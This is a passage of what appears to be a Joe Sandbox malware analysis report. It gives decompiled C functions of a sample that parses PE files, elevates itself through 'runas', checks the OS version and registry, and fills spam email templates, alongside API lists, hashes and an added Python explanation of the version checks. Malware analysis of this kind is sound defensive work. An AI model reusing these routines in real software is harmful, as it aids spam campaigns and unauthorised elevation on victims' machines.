                                                                                0x00402eae
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402eb5
                                                                                0x00402eb7
                                                                                0x00000000
                                                                                0x00402eba
                                                                                0x00402eba
                                                                                0x00402ebc
                                                                                0x00402eca
                                                                                0x00402ed0
                                                                                0x00402ed1
                                                                                0x00402ed6
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00402ed6
                                                                                0x00402ebc
                                                                                0x00402ed8
                                                                                0x00402ed8
                                                                                0x00402eda
                                                                                0x00000000
                                                                                0x00402e78

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                • htons.WS2_32(00000035), ref: 00402E88
                                                                                • inet_addr.WS2_32(?), ref: 00402E93
                                                                                • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040675C(CHAR* _a4, long* _a8, long _a12) {
                                                                                				long _v8;
                                                                                				void* _v12;
                                                                                				struct _OVERLAPPED* _v16;
                                                                                				long _v20;
                                                                                				struct _OVERLAPPED* _v24;
                                                                                				long _v28;
                                                                                				intOrPtr _v48;
                                                                                				intOrPtr _v52;
                                                                                				intOrPtr _v60;
                                                                                				void _v68;
                                                                                				long _v72;
                                                                                				void _v132;
                                                                                				intOrPtr _v320;
                                                                                				signed int _v360;
                                                                                				signed int _v374;
                                                                                				void _v380;
                                                                                				void* _t85;
                                                                                				long _t88;
                                                                                				long _t102;
                                                                                				struct _OVERLAPPED* _t103;
                                                                                				long _t115;
                                                                                				long _t120;
                                                                                				signed int _t143;
                                                                                				void* _t146;
                                                                                
                                                                                				_v16 = 0;
                                                                                				_v8 = 0;
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 0x80);
                                                                                				}
                                                                                				_t85 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                				_v12 = _t85;
                                                                                				if(_t85 == 0xffffffff) {
                                                                                					_v12 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 4, 0);
                                                                                				}
                                                                                				if(_a12 != 0) {
                                                                                					SetFileAttributesA(_a4, 2);
                                                                                				}
                                                                                				if(_v12 != 0xffffffff) {
                                                                                					_t88 = GetFileSize(_v12, 0);
                                                                                					_v8 = _t88;
                                                                                					if(_t88 == 0xffffffff || _t88 == 0) {
                                                                                						L31:
                                                                                						_v8 = 0;
                                                                                					} else {
                                                                                						_a12 = 0;
                                                                                						_v28 = 0;
                                                                                						if(ReadFile(_v12,  &_v132, 0x40,  &_a12, 0) == 0 || SetFilePointer(_v12, _v72, 0, 0) == 0xffffffff || ReadFile(_v12,  &_v380, 0xf8,  &_v28, 0) == 0 || SetFilePointer(_v12, (_v360 & 0x0000ffff) + _v72 + 0x18, 0, 0) == 0xffffffff) {
                                                                                							goto L31;
                                                                                						} else {
                                                                                							_v20 = 0;
                                                                                							_v24 = 0;
                                                                                							if(0 < _v374) {
                                                                                								while(1) {
                                                                                									_t115 = 0x28;
                                                                                									_a12 = _t115;
                                                                                									if(ReadFile(_v12,  &_v68, _t115,  &_a12, 0) == 0) {
                                                                                										break;
                                                                                									}
                                                                                									_t143 = _v374 & 0x0000ffff;
                                                                                									if(_v24 != _t143 - 1) {
                                                                                										_t120 = _v48 + _v52;
                                                                                									} else {
                                                                                										_t120 = (_v320 + _v60 - 0x00000001 &  !(_v320 - 1)) + _v48;
                                                                                									}
                                                                                									_a12 = _t120;
                                                                                									if(_v20 < _t120) {
                                                                                										_v20 = _t120;
                                                                                									}
                                                                                									_v24 = _v24 + 1;
                                                                                									if(_v24 < _t143) {
                                                                                										continue;
                                                                                									} else {
                                                                                									}
                                                                                									goto L23;
                                                                                								}
                                                                                								_v8 = 0;
                                                                                							}
                                                                                							L23:
                                                                                							if(_v24 >= (_v374 & 0x0000ffff)) {
                                                                                								_t102 = _v20;
                                                                                								if(_v8 > _t102) {
                                                                                									_v8 = _t102;
                                                                                								}
                                                                                								_t103 = E0040EBCC(_v8);
                                                                                								_v16 = _t103;
                                                                                								if(_t103 == 0) {
                                                                                									goto L31;
                                                                                								} else {
                                                                                									if(SetFilePointer(_v12, 0, 0, 0) == 0xffffffff) {
                                                                                										L30:
                                                                                										_v8 = 0;
                                                                                										E0040EC2E(_v16);
                                                                                										_v16 = 0;
                                                                                									} else {
                                                                                										_t146 = _v16;
                                                                                										if(ReadFile(_v12, _t146, _v8,  &_v20, 0) == 0) {
                                                                                											goto L30;
                                                                                										} else {
                                                                                											 *(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 0x10) =  *((intOrPtr*)(((_v374 & 0x0000ffff) - 1) * 0x28 + (_v360 & 0x0000ffff) + _v72 + _t146 + 0x18 + 8)) + _v320 - 0x00000001 &  !(_v320 - 1);
                                                                                											_v8 = _v20;
                                                                                										}
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					CloseHandle(_v12);
                                                                                				}
                                                                                				 *_a8 = _v8;
                                                                                				return _v16;
                                                                                			}
                                                                                0x0040676a
                                                                                0x0040676d
                                                                                0x00406778
                                                                                0x0040677e
                                                                                0x0040677e
                                                                                0x0040679a
                                                                                0x0040679c
                                                                                0x004067a2
                                                                                0x004067b2
                                                                                0x004067b2
                                                                                0x004067b8
                                                                                0x004067bf
                                                                                0x004067bf
                                                                                0x004067c9
                                                                                0x004067d3
                                                                                0x004067d9
                                                                                0x004067df
                                                                                0x0040696b
                                                                                0x0040696b
                                                                                0x004067ed
                                                                                0x00406801
                                                                                0x00406804
                                                                                0x0040680b
                                                                                0x00000000
                                                                                0x00406867
                                                                                0x00406869
                                                                                0x0040686c
                                                                                0x00406876
                                                                                0x00406878
                                                                                0x0040687a
                                                                                0x00406881
                                                                                0x0040688f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406891
                                                                                0x0040689e
                                                                                0x004068ba
                                                                                0x004068a0
                                                                                0x004068b2
                                                                                0x004068b2
                                                                                0x004068bd
                                                                                0x004068c3
                                                                                0x004068c5
                                                                                0x004068c5
                                                                                0x004068c8
                                                                                0x004068ce
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004068d0
                                                                                0x00000000
                                                                                0x004068ce
                                                                                0x004068d2
                                                                                0x004068d2
                                                                                0x004068d5
                                                                                0x004068df
                                                                                0x004068e5
                                                                                0x004068eb
                                                                                0x004068ed
                                                                                0x004068ed
                                                                                0x004068f3
                                                                                0x004068f9
                                                                                0x004068fe
                                                                                0x00000000
                                                                                0x00406900
                                                                                0x0040690b
                                                                                0x0040695a
                                                                                0x0040695d
                                                                                0x00406960
                                                                                0x00406966
                                                                                0x0040690d
                                                                                0x0040690d
                                                                                0x00406920
                                                                                0x00000000
                                                                                0x00406922
                                                                                0x0040694f
                                                                                0x00406955
                                                                                0x00406955
                                                                                0x00406920
                                                                                0x0040690b
                                                                                0x004068fe
                                                                                0x004068df
                                                                                0x0040680b
                                                                                0x00406971
                                                                                0x00406971
                                                                                0x0040697f
                                                                                0x00406986

                                                                                APIs
                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?,74CB43E0,00000000), ref: 0040677E
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,74CB43E0,00000000), ref: 0040679A
                                                                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,74CB43E0,00000000), ref: 004067B0
                                                                                • SetFileAttributesA.KERNEL32(?,00000002,?,74CB43E0,00000000), ref: 004067BF
                                                                                • GetFileSize.KERNEL32(000000FF,00000000,?,74CB43E0,00000000), ref: 004067D3
                                                                                • ReadFile.KERNEL32(000000FF,?,00000040,00408244,00000000,?,74CB43E0,00000000), ref: 00406807
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040681F
                                                                                • ReadFile.KERNEL32(000000FF,?,000000F8,?,00000000,?,74CB43E0,00000000), ref: 0040683E
                                                                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,74CB43E0,00000000), ref: 0040685C
                                                                                • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,74CB43E0,00000000), ref: 0040688B
                                                                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000000,?,74CB43E0,00000000), ref: 00406906
                                                                                • ReadFile.KERNEL32(000000FF,?,00000000,00408244,00000000,?,74CB43E0,00000000), ref: 0040691C
                                                                                • CloseHandle.KERNEL32(000000FF,?,74CB43E0,00000000), ref: 00406971
                                                                                  • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                  • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$Read$Pointer$AttributesCreateHeap$CloseFreeHandleProcessSize
                                                                                • String ID:
                                                                                • API String ID: 2622201749-0
                                                                                • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E00409326(void* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				char _t88;
                                                                                				void* _t89;
                                                                                				int _t92;
                                                                                				void* _t96;
                                                                                				signed int _t97;
                                                                                				signed int _t100;
                                                                                				signed int _t103;
                                                                                				char* _t106;
                                                                                				char* _t111;
                                                                                				signed int _t112;
                                                                                				char* _t116;
                                                                                				signed int _t117;
                                                                                				int _t119;
                                                                                				void* _t146;
                                                                                				signed int _t155;
                                                                                				int _t161;
                                                                                				signed int _t165;
                                                                                				signed int _t167;
                                                                                				void* _t168;
                                                                                				void* _t170;
                                                                                				void* _t172;
                                                                                				void* _t173;
                                                                                				void* _t175;
                                                                                				void* _t176;
                                                                                
                                                                                				_t146 = __ecx;
                                                                                				_t168 = _t170 - 0x60;
                                                                                				E00401910(0x19bc);
                                                                                				 *(_t168 - 0x58) = 0x9c;
                                                                                				if(GetVersionExA(_t168 - 0x58) == 0) {
                                                                                					 *(_t168 - 0x4c) =  *(_t168 - 0x4c) & 0x00000000;
                                                                                					_t9 = _t168 + 0x58;
                                                                                					 *_t9 =  *(_t168 + 0x58) & 0x00000000;
                                                                                					__eflags =  *_t9;
                                                                                				} else {
                                                                                					 *(_t168 + 0x58) = ( *(_t168 - 0x54) << 4) +  *((intOrPtr*)(_t168 - 0x50));
                                                                                				}
                                                                                				_t88 = GetModuleFileNameA(GetModuleHandleA(0), _t168 - 0x15c, 0x104);
                                                                                				if(_t88 == 0) {
                                                                                					 *(_t168 - 0x15c) = _t88;
                                                                                				}
                                                                                				_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                				_t89 = _t168 - 0x15c;
                                                                                				if( *(_t168 + 0x78) == 0) {
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8,  &E00410918, 0xbd, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x40;
                                                                                				} else {
                                                                                					_push(_t89);
                                                                                					_push( *((intOrPtr*)(_t168 + 0x68)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x70)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x74)));
                                                                                					_push( *((intOrPtr*)(_t168 + 0x6c)));
                                                                                					_t92 = wsprintfA(_t168 - 0x95c, E00402544(0x4122f8, 0x4109d8, 0x4d, 0xe4, 0xc8));
                                                                                					_t172 = _t170 + 0x38;
                                                                                				}
                                                                                				 *(_t168 + 0x78) = _t92;
                                                                                				E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                				_t173 = _t172 + 0xc;
                                                                                				if( *(_t168 + 0x58) >= 0x60 &&  *((intOrPtr*)(_t168 + 0x7c)) != 0) {
                                                                                					E0040EF00(_t168 - 0x15c, E00406CC9(_t146));
                                                                                					E0040EF1E(_t168 - 0x15c, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8));
                                                                                					_push(_t168 - 0x15c);
                                                                                					wsprintfA(_t168 +  *(_t168 + 0x78) - 0x95c, E00402544(0x4122f8,  &E00410888, 0x82, 0xe4, 0xc8));
                                                                                					E0040EE2A(_t146, 0x4122f8, 0, 0x100);
                                                                                					_t173 = _t173 + 0x50;
                                                                                				}
                                                                                				 *(_t168 + 0x78) =  *(_t168 + 0x78) & 0x00000000;
                                                                                				 *(_t168 + 0x5c) = E00406EDD();
                                                                                				if( *(_t168 + 0x58) < 0x60) {
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                					_t161 = 0;
                                                                                					__eflags = 0;
                                                                                					L33:
                                                                                					__eflags =  *(_t168 + 0x5c) - _t161;
                                                                                					if( *(_t168 + 0x5c) == _t161) {
                                                                                						L38:
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push(_t161);
                                                                                						L39:
                                                                                						_t96 = E004091EB();
                                                                                						__eflags =  *0x412180 - _t161; // 0x0
                                                                                						if(__eflags != 0) {
                                                                                							 *0x412180 =  *0x412180 | _t165;
                                                                                							__eflags =  *0x412180;
                                                                                						}
                                                                                						__eflags = _t96 - 0x2a;
                                                                                						_t81 = _t96 == 0x2a;
                                                                                						__eflags = _t81;
                                                                                						_t97 = 0 | _t81;
                                                                                						L42:
                                                                                						return _t97;
                                                                                					}
                                                                                					_t100 = E00401820(_t168 + 0x54, _t168 + 0x78);
                                                                                					__eflags = _t100;
                                                                                					if(_t100 != 0) {
                                                                                						_push(_t168 - 0x95c);
                                                                                						_push("runas");
                                                                                						goto L39;
                                                                                					}
                                                                                					_t103 =  *(_t168 + 0x78) | 0x61040000;
                                                                                					__eflags = _t103;
                                                                                					 *0x412180 = _t103;
                                                                                					 *0x41217c =  *(_t168 + 0x54);
                                                                                					if(_t103 != 0) {
                                                                                						 *0x412180 = _t103 | _t165;
                                                                                					}
                                                                                					L31:
                                                                                					_t97 = 0;
                                                                                					goto L42;
                                                                                				}
                                                                                				 *(_t168 + 0x4c) = 4;
                                                                                				 *(_t168 + 0x44) = 5;
                                                                                				 *(_t168 + 0x48) = 1;
                                                                                				_t106 = E00402544(0x4122f8,  &E0041084C, 0x3a, 0xe4, 0xc8);
                                                                                				_t175 = _t173 + 0x14;
                                                                                				if(RegOpenKeyExA(0x80000002, _t106, 0, 0x101, _t168 + 0x50) == 0) {
                                                                                					_t111 = E00402544(0x4122f8, 0x410830, 0x1b, 0xe4, 0xc8);
                                                                                					_t176 = _t175 + 0x14;
                                                                                					_t112 = RegQueryValueExA( *(_t168 + 0x50), _t111, 0, _t168 + 0x54, _t168 + 0x44, _t168 + 0x4c);
                                                                                					__eflags = _t112;
                                                                                					if(_t112 == 0) {
                                                                                						_t116 = E00402544(0x4122f8, 0x410818, 0x16, 0xe4, 0xc8);
                                                                                						_t176 = _t176 + 0x14;
                                                                                						_t117 = RegQueryValueExA( *(_t168 + 0x50), _t116, 0, _t168 + 0x54, _t168 + 0x48, _t168 + 0x4c);
                                                                                						__eflags = _t117;
                                                                                						if(_t117 != 0) {
                                                                                							 *(_t168 + 0x78) = 0x3000;
                                                                                						}
                                                                                					} else {
                                                                                						 *(_t168 + 0x78) = 0x2000;
                                                                                					}
                                                                                					RegCloseKey( *(_t168 + 0x50));
                                                                                					_t165 =  *(_t168 + 0x78);
                                                                                				} else {
                                                                                					_t165 = 0x1000;
                                                                                				}
                                                                                				_t161 = 0;
                                                                                				if( *(_t168 + 0x44) != 0 ||  *(_t168 + 0x48) != 0) {
                                                                                					if( *(_t168 + 0x5c) <= _t161) {
                                                                                						goto L38;
                                                                                					}
                                                                                					_t119 =  *(_t168 - 0x4c);
                                                                                					if( *(_t168 + 0x58) < 0x61 || _t119 < 0x1db0) {
                                                                                						 *0x41217c = _t119;
                                                                                						_t167 = _t165 | 0x61040106;
                                                                                						__eflags = _t167;
                                                                                						goto L30;
                                                                                					} else {
                                                                                						if(E0040F0E4(_t168 - 0x95c, _t168 - 0x195c, 0x800) == 0) {
                                                                                							 *0x41217c = _t161;
                                                                                							_t167 = _t165 | 0x61040107;
                                                                                							L30:
                                                                                							 *0x412180 = _t167;
                                                                                							goto L31;
                                                                                						}
                                                                                						_t97 = E004018E0(0xc8, _t168 - 0x195c, _t168 + 0x5c, _t168 + 0x78);
                                                                                						if(_t97 == _t161) {
                                                                                							_t155 =  *(_t168 + 0x78) | 0x61040000;
                                                                                							 *0x412180 = _t155;
                                                                                							 *0x41217c =  *(_t168 + 0x5c);
                                                                                							if(_t155 != 0) {
                                                                                								 *0x412180 = _t155 | _t165;
                                                                                							}
                                                                                						}
                                                                                						goto L42;
                                                                                					}
                                                                                				} else {
                                                                                					goto L33;
                                                                                				}
                                                                                			}
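Reading the decompiled function above: 0x9c is sizeof(OSVERSIONINFOEXA), so the structure at _t168 - 0x58 holds dwMajorVersion at -0x54, dwMinorVersion at -0x50 and dwBuildNumber at -0x4c. The code packs the version as (dwMajorVersion << 4) + dwMinorVersion and compares it with 0x60 (6.0, Vista) and 0x61 (6.1, Windows 7), and compares dwBuildNumber with 0x1db0 (7600, the Windows 7 RTM build); 0x80000002 is HKEY_LOCAL_MACHINE and the samDesired of 0x101 is KEY_QUERY_VALUE | KEY_WOW64_64KEY. The helper below is an added example for this page, not code from the sample or from Joe Sandbox: it replays that version gate so the branch a given host takes can be read off directly. The branch labels are this example's own, and it does not model the registry values, E00406EDD or E00401820 results that further gate the Vista-and-later path.

```python
"""Replay the OS-version gate of E00409326 (added example, not sample code).

Constants are the literals from the decompilation; release names follow
public Windows version numbering. Branch labels are this example's own.
"""
from typing import Tuple

HKEY_LOCAL_MACHINE = 0x80000002   # hKey argument of the RegOpenKeyExA call
KEY_QUERY_VALUE = 0x0001
KEY_WOW64_64KEY = 0x0100
REG_SAM_USED = 0x101              # samDesired of the RegOpenKeyExA call
PACKED_VISTA = 0x60               # 6.0
PACKED_WIN7 = 0x61                # 6.1
WIN7_RTM_BUILD = 0x1DB0           # 7600

def pack_version(major: int, minor: int) -> int:
    """Mirror of: *(_t168 + 0x58) = (dwMajorVersion << 4) + dwMinorVersion.

    Note the '+' rather than '|': a minor version of 16 or more would alias
    into the next major (6.16 packs to 0x70), which never happens for real
    Windows releases but is worth knowing when comparing against thresholds.
    """
    return (major << 4) + minor

def classify(major: int, minor: int, build: int, getversion_ok: bool = True) -> str:
    """Return the branch E00409326 takes for a reported OS version.

    'legacy'   packed < 0x60: no registry read, straight to the launch path
               (labels L33/L38 in the listing)
    'vista'    packed in [0x60, 0x61) or build < 0x1db0: registry read, then
               the status-flag path that stores 0x61040106
    'win7plus' packed >= 0x61 and build >= 0x1db0: registry read, then the
               extra E0040F0E4 / E004018E0 checks
    When GetVersionExA fails the code zeroes the packed value, which lands in
    'legacy' regardless of the real OS.
    """
    packed = pack_version(major, minor) if getversion_ok else 0
    if packed < PACKED_VISTA:
        return "legacy"
    if packed < PACKED_WIN7 or build < WIN7_RTM_BUILD:
        return "vista"
    return "win7plus"

def decode_sam(sam: int) -> Tuple[str, ...]:
    """Name the access-mask bits set in a RegOpenKeyExA samDesired value."""
    names = {KEY_QUERY_VALUE: "KEY_QUERY_VALUE", KEY_WOW64_64KEY: "KEY_WOW64_64KEY"}
    return tuple(name for bit, name in names.items() if sam & bit)

if __name__ == "__main__":
    # Constructed inputs: (major, minor, build) for a few well-known releases.
    for label, ver in [("XP SP3", (5, 1, 2600)), ("Vista SP2", (6, 0, 6002)),
                       ("Win7 RC", (6, 1, 7100)), ("Win7 SP1", (6, 1, 7601))]:
        print(f"{label:10s} packed=0x{pack_version(*ver[:2]):02x} -> {classify(*ver)}")
    print("RegOpenKeyExA samDesired 0x%03x = %s" % (REG_SAM_USED, " | ".join(decode_sam(REG_SAM_USED))))
```

One caveat when mapping this to a real host: since Windows 8.1, GetVersionExA reports 6.2 to a process without a compatibility manifest, so a Windows 10 machine (10.0 would pack to 0xa0) is seen by this sample as 0x62 and still takes the 'win7plus' branch; the KEY_WOW64_64KEY bit means the 32-bit binary reads the native 64-bit registry view rather than the WOW6432Node redirect.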
                                                                                [Address column of the C-Code listing, detached from its statements during extraction: 148 entries from 0x00409326 (function entry) to 0x004096a9.]
                                                                                0x00000000
                                                                                0x004095db
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                • wsprintfA.USER32 ref: 004093CE
                                                                                • wsprintfA.USER32 ref: 0040940C
                                                                                • wsprintfA.USER32 ref: 0040948D
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: runas
                                                                                • API String ID: 3696105349-4000483414
                                                                                • Opcode ID: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction ID: 03442aab56affe776738d217652d29bf499ebc974a67126763565949ba301525
                                                                                • Opcode Fuzzy Hash: 6d5a3b4efbc2d97667e0e89406f7bd4dba45429abf12630261af7769a952681c
                                                                                • Instruction Fuzzy Hash: 53A171B2540208BBEB21DFA1CC45FDF3BACAB44344F104437FA05E6192D7B999848FA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v132;
                                                                                				void* _t46;
                                                                                				char* _t71;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t73;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                
                                                                                				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
                                                                                				E0040EF00( &_v132, "%FROM_EMAIL");
                                                                                				E00405CE1( &_v132, 0x64, _a16, 0, 0);
                                                                                				_t71 = E0040ED03( &_v132, 0x40);
                                                                                				_t77 = _t76 + 0x38;
                                                                                				_t83 = _t71;
                                                                                				if(_t71 != 0) {
                                                                                					_t7 = _t71 + 1; // 0x1
                                                                                					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
                                                                                					 *_t71 = 0;
                                                                                					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
                                                                                					_t77 = _t77 + 0x28;
                                                                                				}
                                                                                				_t72 = _a12;
                                                                                				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
                                                                                				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
                                                                                				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
                                                                                				_t73 = _a4;
                                                                                				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
                                                                                				_t46 = E0040F0CB( &_v132);
                                                                                				_push(0);
                                                                                				_push( &_v132);
                                                                                				_push(_t46);
                                                                                				E0040F133();
                                                                                				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
                                                                                				_push(_t73);
                                                                                				E0040AD89( &_v132, _t83);
                                                                                				E0040B211(0,  &_v132, 0);
                                                                                				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
                                                                                				E0040B211(0,  &_v132, 5);
                                                                                				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
                                                                                				E0040B211(0,  &_v132, 0xfffffffb);
                                                                                				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
                                                                                				_t75 = _a8;
                                                                                				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
                                                                                				return _t75;
                                                                                			}
                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040B467
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 00E3202D
                                                                                • GetSystemInfo.KERNEL32(?), ref: 00E3204F
                                                                                • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 00E3206A
